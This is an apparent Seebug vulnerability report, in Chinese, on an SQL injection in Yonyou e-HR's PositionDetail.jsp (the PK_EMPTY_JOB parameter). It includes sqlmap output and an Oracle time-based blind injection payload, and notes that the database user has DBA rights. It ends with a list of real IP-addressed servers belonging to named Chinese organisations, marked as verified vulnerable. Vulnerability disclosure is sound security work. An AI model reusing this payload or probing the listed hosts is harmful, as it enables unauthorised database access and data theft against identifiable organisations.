用友人力资源管理(e-HR)SQL注入漏洞

2014-07-09T00:00:00
ID SSV:93245
Type seebug
Reporter Root
Modified 2014-07-09T00:00:00

Description

简要描述:


说点啥

详细说明:

<img src="https://images.seebug.org/upload/201407/09172603828f8c376c669ace4f60371f368e3c3b.png" alt="472F3300-37DA-4FDD-AAF3-E36E8A5A52F7.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201407/09172751d662bc843259287c82833cfc2deeb393.png" alt="7DD296A6-915C-4763-9C00-E0110C272A7E.png" width="600" onerror="javascript:errimg(this);">

/hrss/rm/PositionDetail.jsp文件中PK_EMPTY_JOB参数存在SQL注入漏洞

``` 直接丢SQLMAP里跑: http://219.140.193.253/hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001A11000000000G9WA& GET parameter 'PK_EMPTY_JOB' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection points with a total of 114 HTTP(s) requests:


Place: GET Parameter: PK_EMPTY_JOB Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: PK_EMPTY_JOB=1001A11000000000G9WA') AND 3750=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(119)||CHR(83)||CHR(84),5) AND ('nlJx'='nlJx&


[16:32:22] [INFO] the back-end DBMS is Oracle web application technology: JSP back-end DBMS: Oracle [16:32:22] [INFO] fetched data logged to text files under '/Users/loli/sqlmap/output/219.140.193.253' ```

current user is DBA: True

<img src="https://images.seebug.org/upload/201407/09164325c42ab514edcb091ad718451b5cc638de.png" alt="YONGYOU1.png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

给点URL(已验证):

http://59.173.0.46:8090/hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001A11000000000G9WA& 中冶集团武汉勘察研究院有限公司 http://120.40.72.157:4001/hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001V110000000000O0W& 福建省石油化学工业设计院